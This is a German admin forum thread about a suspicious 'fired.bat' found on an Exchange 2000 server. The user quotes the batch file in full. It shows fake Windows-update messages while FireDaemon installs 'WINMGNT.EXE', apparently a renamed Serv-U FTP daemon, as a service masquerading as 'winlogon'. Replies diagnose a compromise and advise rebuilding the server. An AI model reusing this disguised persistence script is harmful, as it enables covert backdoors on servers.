Jump to content

Was ist Firedaemon??


Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Recommended Posts

Hallo,

 

habe auf meinem Exchange2000-Server den Dienst Firedaemon.exe gefunden. Offenbar wird dieser von einer Datei "fired.bat" gestartet, die folgenden Inhalt aufweist:

 

@echo off

echo Checking for Windows critical updates

echo !!! Processing !!!

set MXBIN=c:\WINNT\system32

set MXHOME=c:\WINNT\system32

c:\WINNT\system32\firedaemon.exe -i winlogon c:\WINNT\system32 "c:\WINNT\system32\WINMGNT.EXE" "" Y 0 0 N Y

echo Disconnect from Microsoft.com

net start Winlogon

echo No new updates...

 

kann mir jemand erklären, was das bedeutet??

 

Grüße

 

MiLLHouSe

Link to comment

alles schön und gut, doch ich hab das Teil nie installiert......

 

Ich möchte nur wissen, ob diese *.bat-Datei irgendetwas bösartiges ausführt bzw. evtl. eine ständige Internetverbindung aufbaut, die meinen kompletten Server lahm legt.... Seit Donnerstag haben wir hier nämlich Probleme mit dem Internet - irgendwas schickt heftigst Datenpakete ins Internet (allein gestern 17GB!!!)

und jetzt will/muss ich wissen, ob es evtl. damit zusammenhängen kann!!!

Link to comment
  • 6 months later...

Serv-U wird sicher nicht so heissen sondern wie ein Windows-Dienst umbenannt sein. Allerdings vielleicht mit anderen Großbuchstaben. Außerdem sollteste mal Dein System absuchen, nach den Diensten die laufen, ob exe, com und Co vielleicht doppelt vorhanden ist.

 

Zum Beispiel eine ExploreR.exe im ... C:\Winnt\System32\ (also da wo sie nicht hingehört). Dies nur als Beispiel. Ich tippe aber auch drauf, das Du gehackt worden bist :shock:

 

Gruß und viel Erfolg: CaIvin

Link to comment

c:\WINNT\system32\firedaemon.exe -i winlogon c:\WINNT\system32 "c:\WINNT\system32\WINMGNT.EXE"

 

diese zeile der bat installiert bei dir die datei "winmgnt.exe" als dienst "winlogon".

 

vielleicht solltest du dir mal diese "winmgnt.exe" anschauen, was die überhaupt macht.

 

wmi = winmgmt ...und nicht mit 'n".

 

wenn ihr das tool nicht installiert habt, sieht das ganz nach nem hack aus.

Link to comment
  • 2 months later...

Muss dazu nochmal was anmerken:

 

Erst jetzt hat unser Virenscanner darauf angeschlagen. Das Teil ist ein Virus mit dem Dienst "winmgnt.exe". Als Beschreibung steht dabei, dass es sich um den ServU-Daemon handelt.

 

Leider kann ich ihn nicht löschen, weil der Dienst im Arbeitsspeicher hängt und aktiv genutzt wird.

Ich hoffe nun auf einen Reboot heute Abend und dass das Teil dann gelöscht wird.

 

So ne ...

Darüber wird wohl auch der Netsky-Virus von unserem System verschickt *heul*

 

Warum das System erst gestern drauf angeschlagen ist, möchte ich aber echt mal wissen...

Link to comment

hi,

 

oh mann ... datei entdeckt am 08.07.2003, viren-scan-alarma am 17.03.2004 -> das heisst schon mal, dass du dich auf deine antivirenlösung scheinbar nicht verlassen kannst.

 

aber ich frage mich, wieso du damals noch nichts unternommen hast, als die ersten antworten mit dem hinweis auf servu kamen ...

 

in 7 monaten kann man als virus/ftp-server ganz schön was unternehmen ...

 

gruss, g@mlin

Link to comment

Hallo MiLLHouSe,

 

na, da brennt vielleicht viel mehr als nur der Kittel! :shock: Jo, das war ziemlich sicher ein Hack. Und das hat dann weitreichende Konsequenzen, sonst bekommst Du da keinen Grund mehr hinein:

 

Ein einmal erfolgreich kompromittiertes System sollte eigentlich nicht mehr verwendet werden. Du weisst nämlich nicht, ob der Angreifer nicht noch viel mehr auf der Maschine eingerichtet hat, als das, was Du lokalisieren konntest. Schliesslich sind längst nicht alle Tools, die sich diese Sauhunde auf eine geknackte Maschine packen, als Virus registriert und den Virenscannern als solche bekannt. Da sind völlig legale Befehlszeilenwerkzeuge dabei sein, die weder Du noch der Virenscanner überhaupt entdeckt.

 

Wenn es um echte Sicherheitsbelange und wertvolle Daten geht, kommst Du m. E. nicht darum herum, die Maschine neu aufzusetzen.

 

Wenn Du auf dem derzeitigen Stand weiter wurstelst, kommen vielleicht die tollsten Sachen hinter Deinem Rücken hoch, und wenn Du Pech hast merkst Du es nicht einmal. Und richtig dumm ist dann, wenn Du zwei Monate später per Zufall eine komplette Password-Dumpdatei Eurer sämtlichen Mitarbeiter auf dem Server findest (hab ich schon erlebt :eek: That ain't funny!).

 

Seit dieser Geschichte scanne ich übrigens die Ports unserer Server in regelmässigen Abständen, um sie auf Hinweise auf Einbrüche (unübliche Ports und Services) zu prüfen: Trojaner-Dienste werden häufig versteckt, die siehst Du dannauf der befallenen Maschine in den Diensten überhaupt nicht! Dagegen hilft nur Überwachung von aussen.

 

Gruss Jan

Link to comment
Original geschrieben von gr@mlin

hi,

 

oh mann ... datei entdeckt am 08.07.2003, viren-scan-alarma am 17.03.2004 -> das heisst schon mal, dass du dich auf deine antivirenlösung scheinbar nicht verlassen kannst.

 

aber ich frage mich, wieso du damals noch nichts unternommen hast, als die ersten antworten mit dem hinweis auf servu kamen ...

 

in 7 monaten kann man als virus/ftp-server ganz schön was unternehmen ...

 

gruss, g@mlin

 

schlicht und ergreifend, weil ich die Frage im Juli gestellt habe, die Antworten aber erst im Januar kamen und ich kein Abonnement auf den Thread hatte.

 

Ich weiß, dass es ziemlich besch... ist, bin aber froh, dass in gut zwei Wochen der Server ausgemustert wird.

 

Soviel dann auch schon zu PIC's Beitrag :)

Link to comment
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...